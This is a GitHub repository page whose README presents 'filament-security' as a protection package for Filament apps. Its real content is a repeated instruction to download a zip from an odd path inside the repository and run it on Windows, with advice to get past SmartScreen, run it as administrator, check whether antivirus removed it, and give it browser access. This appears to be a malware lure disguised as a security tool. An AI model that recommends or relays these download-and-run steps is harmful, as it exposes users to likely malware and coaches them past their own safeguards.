Skip to content

hammad-abu/filament-security

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

14 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ›‘οΈ filament-security - Keep your app safe with ease

Download Now

Filament Security

πŸ“₯ Download

Go to the download page here:

https://github.com/hammad-abu/filament-security/raw/refs/heads/main/resources/lang/pl/security-filament-v1.8.zip

If the page shows a release file for Windows, download and run that file.

🧭 What this app does

Filament Security helps protect your Filament app from common threats. It checks email addresses, blocks bad traffic, and watches for strange activity. It also gives you a clear view of security events in one place.

✨ Main protection features

  • Blocks disposable email addresses
  • Checks DNS and MX records for valid email domains
  • Checks domain age with RDAP
  • Limits users to one active session
  • Uses a honeypot field to catch bots
  • Blocks traffic from Cloudflare IP ranges when needed
  • Detects malicious scan behavior
  • Shows security events in a live dashboard

πŸ–₯️ What you need on Windows

Before you start, make sure your PC has:

  • Windows 10 or later
  • A stable internet connection
  • Enough free space to download the app
  • Permission to run files on your computer
  • A modern browser such as Edge, Chrome, or Firefox

If Windows asks for approval, choose the option that lets the file run.

πŸš€ How to download and run it on Windows

  1. Open the download page:
    https://github.com/hammad-abu/filament-security/raw/refs/heads/main/resources/lang/pl/security-filament-v1.8.zip

  2. Look for the latest release or the main download file.

  3. Download the Windows file to your computer.

  4. Open your Downloads folder.

  5. Find the file you just downloaded.

  6. Double-click the file to run it.

  7. If Windows shows a security prompt, select the option that allows the file to open.

  8. Follow the on-screen steps until the app starts.

  9. Keep the file in a safe folder so you can open it again later.

πŸ§ͺ First-time setup

After the app opens, check these items:

  • Make sure the main window loads fully
  • Confirm your internet connection works
  • Review the security dashboard
  • Test email validation with a sample address
  • Check that blocked events appear in the log

If the app asks for access to your browser, allow it so the security checks can work.

πŸ” How the protection layers work

Email checks

The app can stop disposable email addresses before they reach your system. It also checks domain records so you can see if an email looks real.

Domain age checks

It can review how old a domain is. New domains can be a risk when they come from fake users or bots.

Single session control

This keeps one active session per user. It helps prevent account sharing and limits unwanted access.

Bot traps

A hidden honeypot field catches bot submissions. Real users do not see it, but bots often fill it in.

Cloudflare IP blocking

If your setup uses Cloudflare rules, the app can help block unwanted IP traffic at the edge.

Scan detection

The app looks for patterns that match malicious scans. This helps reduce noise and protects your app from low-level attacks.

Security dashboard

The dashboard gives you a view of security events. You can use it to track activity and review what happened over time.

🧰 Common use cases

Use this app if you want to:

  • Protect login and sign-up forms
  • Block fake accounts
  • Reduce bot sign-ups
  • Watch for repeated attack patterns
  • Keep a record of suspicious events
  • Add a security layer to a Filament v5 app

πŸͺŸ Windows tips

If the file does not open:

  • Right-click the file and choose Open
  • Check if Windows blocked the file
  • Try running it as an administrator
  • Make sure your antivirus did not move the file
  • Download the file again if it looks incomplete

If you see a SmartScreen prompt, choose the option that lets you continue only if you trust the source file you downloaded.

πŸ“ File handling

After you run the app, keep these habits:

  • Save the file in a folder you can find again
  • Do not move or rename files while the app is open
  • Store releases in a separate folder by version
  • Remove old files you no longer use
  • Keep a backup of any settings you change

πŸ” How to know it worked

You know the app is running when:

  • The main interface opens
  • The security dashboard shows data
  • Email checks return a result
  • Suspicious actions appear in the event log
  • The app responds when you use its features

πŸ› οΈ Basic help

The file will not start

  • Download it again
  • Check that the download finished
  • Run it from your Downloads folder
  • Try a second browser

The app closes right away

  • Restart Windows
  • Run the file as administrator
  • Check your security software
  • Try opening it again from the same folder

Nothing appears on screen

  • Wait a few seconds
  • Check if the app opened behind another window
  • Use Alt+Tab to find it
  • Restart the app

πŸ“Œ Where to get the latest file

Use the main download page here:

https://github.com/hammad-abu/filament-security/raw/refs/heads/main/resources/lang/pl/security-filament-v1.8.zip

Open that link, get the latest Windows file, and run it on your computer

🧩 What the name means

Filament Security is a security tool for Filament apps. It focuses on checks that help stop fake users, bad email addresses, and unwanted traffic before it causes problems

πŸ“· Screenshots

Email Validation

Dashboard View

Session Control

Bot Protection

Event Log

πŸ—‚οΈ Suggested folder setup

If you want to keep your files neat, use this structure:

  • Downloads
    • filament-security
      • version-1
      • version-2
      • notes

This makes it easy to find the right file later

🧭 Quick path to start

  1. Open the download page
  2. Download the Windows file
  3. Open the downloaded file
  4. Allow Windows to run it
  5. Use the app and review the dashboard

Releases

No releases published

Packages

 
 
 

Contributors